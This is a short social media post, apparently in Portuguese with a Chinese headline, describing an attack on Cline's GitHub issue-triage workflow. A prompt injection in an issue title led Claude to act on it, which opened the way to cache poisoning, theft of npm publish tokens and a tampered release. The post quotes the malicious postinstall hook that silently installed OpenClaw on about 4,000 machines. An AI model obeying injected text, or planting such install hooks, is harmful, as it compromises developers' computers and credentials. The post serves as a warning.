黑客利用 Cline 的 GitHub 工作流中的提示词注入漏洞，在 4000 台开发者电脑上静默安装了 OpenClaw。

Um hacker simplesmente hackeou o @cline e instalou o OpenClaw em 4.000 computadores com prompt injection 🫠

Olha que loucura:

- O time do Cline criou um workflow de triagem de issues automatizado no GitHub, usando o próprio Claude pra ler e categorizar os tickets
- O hacker abriu uma issue com um prompt injection no título — o Claude leu, achou que era uma instrução legítima, e executou
- Com isso, ele encheu o cache do GitHub com lixo até forçar a deleção dos caches legítimos de build, substituiu por caches envenenados, e roubou os tokens de publicação do npm
- Com os tokens em mãos, ele publicou uma nova versão do cline que parecia idêntica a anterior, só que com uma linhazinha a mais no package.json: "postinstall": "npm install -g openclaw@latest"

Resultado: 4,000 devs instalaram o openclaw nas suas máquinas sem saber (aka: um agente com acesso total ao seu computador) 🥲

Muito importante lembrar que IAs não têm malícia e por isso prompt injections são, na minha opinião, a maior vulnerabilidade delas.

Resumindo galera: CUIDADO.

quem quiser ler na íntegra: https://t.co/dedPp8fPxF